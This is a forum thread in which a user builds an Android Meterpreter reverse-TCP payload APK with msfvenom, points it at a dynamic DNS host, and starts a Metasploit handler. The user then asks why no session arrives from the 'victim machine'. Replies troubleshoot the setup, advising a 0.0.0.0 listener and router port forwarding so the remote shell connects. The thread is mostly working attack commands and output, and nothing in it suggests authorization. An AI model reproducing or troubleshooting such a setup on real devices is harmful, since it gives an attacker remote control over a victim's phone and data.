first , i download no-ip in my linux machine after i create an account ........
i checked the host name by pinging it
then i create a payload :
msfvenom -p android/meterpreter/reverse_tcp LHOST=<hostname> LPORT= 4444 -o test.apk
" i port forwarding this port and check it ,
hostname is the ddns "
then launch METASPLOIT
msfconsole
use multi/handler
set payload android/meterpreter/reverse_tcp
set lhost <hostname>
set lport 4444
exploit
Handler failed to bind to <public ip>:4444:- -
Started reverse TCP handler on 0.0.0.0:4444
Starting the payload handler...
then it can't listen to any session , what is the problem? please help .
note that i make every thing in the linux machine and the payload is running at the victim machine
5 Responses
Your problem is that you are using the hostname in your listener. You do not need to do so as the port forwarding will forward the traffic to your computer. So when setting up your listener, use either 0.0.0.0 or your local IP address for Kali.
Then go to another device and try typing your hostname with the port in the web browser. (http:// myhostname.ddns.net:4444) If port forwarding is set correctly you will get activity.
It looks like the listener has started correctly on 0.0.0.0 and a DDNS entry has been created but the traffic isn;t hitting the listener. I would assume no port forward has been set up on the ASDL/Cable router.
Have you created a port-forward on your ISP router?
https://null-byte.wonderhowto.com/forum/basic-networking-for-penetration-testers-0177159/
Just an FYI, No-IP are quick to disable even paid accounts if the suspect you are using Dyn DNS for something malicious, I speak from experience and I only used it for a pen test lab lol.
Share Your Thoughts